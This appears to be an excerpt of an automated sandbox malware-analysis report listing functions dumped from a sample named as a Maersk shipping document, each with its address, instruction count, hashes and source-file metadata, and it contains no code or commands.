                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    • Opcode ID: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                    • Instruction ID: b7d58deb7cc90963252eb6ac6c1b5ebeac5f0ec5234f305d9de43ae0b65d65ab
                                                    • Opcode Fuzzy Hash: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                    • Instruction Fuzzy Hash: BA417072508342ABD711DA75D884BEBFBE8AF88B14F440A2DF684D7280EB74D944C796
                                                    Function 0181C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                    • Instruction ID: eae4daf10ff13b91d351460383e18c523a88414715315124ce99cff58efdc6f9
                                                    • Opcode Fuzzy Hash: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                    • Instruction Fuzzy Hash: F44142B2D4022DAADB21DB54CC84FDEB7BCAB44714F0045A5EB08EB145DB709F898FA5
                                                    Function 01836B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    • Opcode ID: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                    • Instruction ID: 5946c84e1bcd33f50f9f724baf521927bf96112e6e9fc953a125430dd273c517
                                                    • Opcode Fuzzy Hash: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                    • Instruction Fuzzy Hash: 1231FE31A00719ABDB22DB6DC854BEEBBF4DF55704F284068E941DB282E775DB06CB90
                                                    Function 0181CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                    • Instruction ID: 0cc54062ad31c98313f2364a27aba55ad2e9678629277c1811cd748a43e42e51
                                                    • Opcode Fuzzy Hash: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                    • Instruction Fuzzy Hash: E931D177A40519AFEB16DB59C845E6FBBB8FB80720F014129E905E7255D730AE04DBE0
                                                    Function 0182892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • API String ID: 0-702105204
                                                    • Opcode ID: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                    • Instruction ID: 97b68c095d8a05cd39094598003da0ca45033e152ecb5eb98e440abcc7a504d6
                                                    • Opcode Fuzzy Hash: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                    • Instruction Fuzzy Hash: E001F7323002319BEF276F9AD8C4B6A7BA5EF82754F08011DF64186555CB207AC0C792
                                                    Function 01842000 Relevance: .8, Instructions: 757COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                    • Instruction ID: cd0c04fab7fc9366772328b9c24abe4154d83e1162bbd54109144cbc8d9144c3
                                                    • Opcode Fuzzy Hash: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                    • Instruction Fuzzy Hash: FC42C53560C3498BE725CF68D890A6FFBE6AF88704F04092DFA82D7250DB71DA45CB52
                                                    Function 01838158 Relevance: .6, Instructions: 617COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                    • Instruction ID: 1c5031d33e243d2523a3bda428cec4d85bc798be092cc7b8514bd3158e8524a0
                                                    • Opcode Fuzzy Hash: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                    • Instruction Fuzzy Hash: A3424275E102198FEB25CF69C881BADFBF5BF89300F188199E949EB241D7349A85CF50
                                                    Function 017B2840 Relevance: .6, Instructions: 605COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                    • Instruction ID: 09d670deff33227186743ce2ea9891a705627e284390fa1342991dd26eaa4988
                                                    • Opcode Fuzzy Hash: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                    • Instruction Fuzzy Hash: 9F32DF70A007598FDB66CF69CC847BABBF2BF84304F24411DE556DB285E735AA21CB50
                                                    Function 0184A118 Relevance: .6, Instructions: 591COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                    • Instruction ID: 0daf9a6aebe6519eed4b9684641d584cd4ac8d73426f51147c1a9e4e02c0daa9
                                                    • Opcode Fuzzy Hash: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                    • Instruction Fuzzy Hash: 7222C2742446698BEB2DCF2DC094376BBF1AF44304F08845AE997CF286EB35D652DB60
                                                    Function 017A6A50 Relevance: .5, Instructions: 548COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                    • Instruction ID: 8b6faa3d61cb7bffe2f6e5ec16c2f13c35559ed388bc409c25cd5c6fd987c9db
                                                    • Opcode Fuzzy Hash: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                    • Instruction Fuzzy Hash: DC32AE71A01209CFDB25CF68C884AAAF7F1FF88310F684669E955EB391D734E941CB90
                                                    Function 017C4A35 Relevance: .4, Instructions: 423COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                    • Instruction ID: 97e43d292e6b0621cb476774175645ac0d2f51d18b30d3f75c71de6a4729ec2c
                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                    • Instruction Fuzzy Hash: 43F17074E0020A9BDB25DF99C994BAEFBF5AF48B10F04812DE902EB354E734E941CB50
                                                    Function 0183892B Relevance: .4, Instructions: 386COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                    • Instruction ID: 74cefc0a1422cf707b425ee100eae59c8c003b51e157a5df0008ddafd1b190b4
                                                    • Opcode Fuzzy Hash: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                    • Instruction Fuzzy Hash: 2DD1D471A0060A9BDF15CF69C841AFEB7F1AFC9304F1C8269E955E7241D735EA068B90
                                                    Function 017A65D0 Relevance: .4, Instructions: 383COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                    • Instruction ID: 6a6d744c21ac7b3df6a6dc737763c1590856ba30b3d24ee5f0211c8b63ce3225
                                                    • Opcode Fuzzy Hash: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                    • Instruction Fuzzy Hash: 6DE17871608342CFC715CF28C494A6AFBE0BF89314F598A6DF99987351EB31E905CB92
                                                    Function 01798397 Relevance: .4, Instructions: 380COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                    • Instruction ID: 5f7b8f96c74019fefedfac4daa078a9291025d66b48c0851f4ae4f75437d74e4
                                                    • Opcode Fuzzy Hash: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                    • Instruction Fuzzy Hash: A3D1EF71A0020A9BDF14CF68D880ABFF7B5BF55304F14426DEA12DB290EB34E958CB61
                                                    Function 01828243 Relevance: .3, Instructions: 322COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                    • Instruction ID: 3168b28e44b09dbc41e0bd281fe915e0e8d035ce6f4c49b9db724e5c1f7b6eb1
                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                    • Instruction Fuzzy Hash: EBB1A274A00619AFDF26DB98C940AABBBF5FF86304F14445DEA02D7790DB74EA85CB10
                                                    Function 017B0535 Relevance: .3, Instructions: 300COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                    • Instruction ID: f5fb7a2338aa8ba4a22fd2ea885475944e8e4d4adc594f179a227b4f7945ba95
                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                    • Instruction Fuzzy Hash: 78B1D73160064AAFDB26DB68C894BBFFBF6AF44304F144599E652D7285DB30DE41CB50
                                                    Function 017A83C0 Relevance: .3, Instructions: 281COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                    • Instruction ID: 365c54488afc685f2bcca24b2f5e6cb622264f015d7614d835aad79984610b2d
                                                    • Opcode Fuzzy Hash: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                    • Instruction Fuzzy Hash: 90C159742083458FE764CF19C498BABF7E5BF88304F54496DE98987291E774EA08CF92
                                                    Function 0179C427 Relevance: .3, Instructions: 280COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                    • Instruction ID: ba244a815379440cc9020d5ba61e917d475edac33734b83dd28a432619332f1a
                                                    • Opcode Fuzzy Hash: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                    • Instruction Fuzzy Hash: 85B17170A002668BDF65CF68D890BA9F7F5EF44700F1485E9D50AE7385EB309E89CB21
                                                    Function 017CE5E7 Relevance: .3, Instructions: 278COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                    • Instruction ID: 27daead4cbb9c3ef54b4ccc603e27d66b150ea4d87c7334cbaebaf07434c1165
                                                    • Opcode Fuzzy Hash: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                    • Instruction Fuzzy Hash: 33A1E531E006599FEB32DB58CC48BADFFA4AB05B14F154169EB01EB2D1DB749E40CB91
                                                    Function 017E0185 Relevance: .3, Instructions: 276COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                    • Instruction ID: 2e252fe47a24401ddc723786c5b2cb5dc243eb77ab5f307ff7ff5473ce3ca69b
                                                    • Opcode Fuzzy Hash: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                    • Instruction Fuzzy Hash: 97A10271B006169FDB24CF69C998BAAF7F5FF49318F104029EA05E7285DBB4E911CB50
                                                    Function 01874500 Relevance: .3, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                    • Instruction ID: 3b3051312ee83dfd7087bcb1ca103fbc3e4201780476233368473b3c88b756ec
                                                    • Opcode Fuzzy Hash: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                    • Instruction Fuzzy Hash: 7AA1EC72A04216EFC722DF28C984B6ABBE9FF48744F150928F589DB655D334EE40CB91
                                                    Function 01872B57 Relevance: .3, Instructions: 266COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                    • Instruction ID: c3aad9f807a60214cae9ba64279f6c45e1ebcf2fe6dc3db938b40e921ea4912a
                                                    • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                    • Instruction Fuzzy Hash: C0B12771E0061ADFDB25CFA9C880AADBBB6BF88314F148129E914E7355D730EA41CB90
                                                    Function 018260E0 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                    • Instruction ID: e2fc196847533b233ca84e1feb3102de72cb428188739bbb4262b9ea311b8977
                                                    • Opcode Fuzzy Hash: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                    • Instruction Fuzzy Hash: C0918871D00125AFDB16CF58D884BAEBFB5EF49710F254159EA10EB345E734EE409BA0
                                                    Function 017BE3F0 Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                    • Instruction ID: d347fb7dd2dd8eec16ea0a121ba7dc8e71ccc60dc2e8c91305d7b66f8cd8d252
                                                    • Opcode Fuzzy Hash: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                    • Instruction Fuzzy Hash: C7912531A00616CBDB259B58C8C4BF9FBA1EF84714F2540A9F905DB386FB38DA41C791
                                                    Function 017F6ACC Relevance: .2, Instructions: 226COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                    • Instruction ID: b10ee2e88ea09f28ed10910c084c207982b23d41a7edb48dc2a3d5b2f47a1875
                                                    • Opcode Fuzzy Hash: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                    • Instruction Fuzzy Hash: 9B815E71A0061A9BDB24CF69C944ABFFBF9FB48700F14852EE555D7641E334E940CBA4
                                                    Function 0186AB40 Relevance: .2, Instructions: 222COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                    • Instruction ID: 7caa9fab62ad76711b1a7158866fb0912d9c7a4fc7f9e1328bc0f77ba71bcd30
                                                    • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                    • Instruction Fuzzy Hash: 20817271A002099FDF1DCF58C890AAEBBBAFF94314F148569D916EB344DB34DA41CB50
                                                    Function 017DE284 Relevance: .2, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                    • Instruction ID: e750f47676a95600baeaed61586530467d99b782dd1c8b3d353334da1644e686
                                                    • Opcode Fuzzy Hash: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                    • Instruction Fuzzy Hash: 88815E71A00609AFDB26CFA9C880BEEFBFAFF48354F144429E555A7254DB30AD45CB60
                                                    Function 017BC640 Relevance: .2, Instructions: 206COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                    • Instruction ID: bfdae8a0097f9861468c04aec80cdeab4291f5f3482a71af1dbae588dd05ac52
                                                    • Opcode Fuzzy Hash: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                    • Instruction Fuzzy Hash: E171DF75D00629DBCB268F59C9907FEFBB1FF59710F14815AE942AB390E3709940CB90
                                                    Function 018547A0 Relevance: .2, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 771d66dccc39a7e0cc7f438eac28abd3b40eaf742dec5867719cd12375294657
                                                    • Instruction ID: 8d2e4e4e7824de0506e026cde8b28b5c9a41a6da97b09829c2ebedd44db4c3c5
                                                    • Opcode Fuzzy Hash: 771d66dccc39a7e0cc7f438eac28abd3b40eaf742dec5867719cd12375294657
                                                    • Instruction Fuzzy Hash: 5871A270901205EFDBA1CF69D944A9ABBF9FF84301F28415AEA14E7259F7368B80CF54
                                                    Function 0182035C Relevance: .2, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                    • Instruction ID: dd0c7f760964975dec0fce6b4bd7cba7810a90c28419d1cb07b91227af8ffef9
                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                    • Instruction Fuzzy Hash: 22715E71A00619EFDB11DFA9C984EEEBBB9FF48704F104569E505E7290DB34EA81CB90
                                                    Function 018362A0 Relevance: .2, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                    • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                    • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                    • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                    Function 017A8AA0 Relevance: .2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
